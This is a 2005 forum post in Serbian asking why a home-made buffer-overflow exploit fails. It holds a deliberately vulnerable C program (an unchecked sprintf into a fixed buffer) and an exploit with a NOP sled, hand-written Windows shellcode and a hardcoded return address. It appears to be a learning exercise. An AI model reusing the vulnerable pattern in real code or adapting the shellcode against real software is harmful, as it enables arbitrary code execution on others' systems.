[ `and @ 09.01.2005. 00:09 ] @
Vuln.c Code: #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { char buffer[100]; sprintf(buffer,argv[1]); return (0); } Exploit.c Code: #include <stdio.h> #include <string.h> main() { char filename[] = "vuln.exe "; char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57" "\xC6\x45\xF8\x4E" "\xC6\x45\xF9\x45" "\xC6\x45\xFA\x54" "\xC6\x45\xFB\x53" "\xC6\x45\xFC\x54" "\xC6\x45\xFD\x41" "\xC6\x45\xFE\x54" "\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes char ret[] = "\xA4\xFE\x12\x00"; static char buffer[1000]; strcat(buffer,filename); strcat(buffer,nops); strcat(buffer, shellcode); strcat(buffer,"IvanBBBB"); strcat(buffer,ret); system(buffer); } I zasto ovo ne radi ? A kada hocu npr da pokrenem cmd ono radi ! Probao sam da pokrenem Notepad i nece, u ovom primeru pokusam da pokrenem netstat i nece ! Kaze da nesto nije u redu sa ESP, tj program mi se srusi odmah nakon RET ! tnx |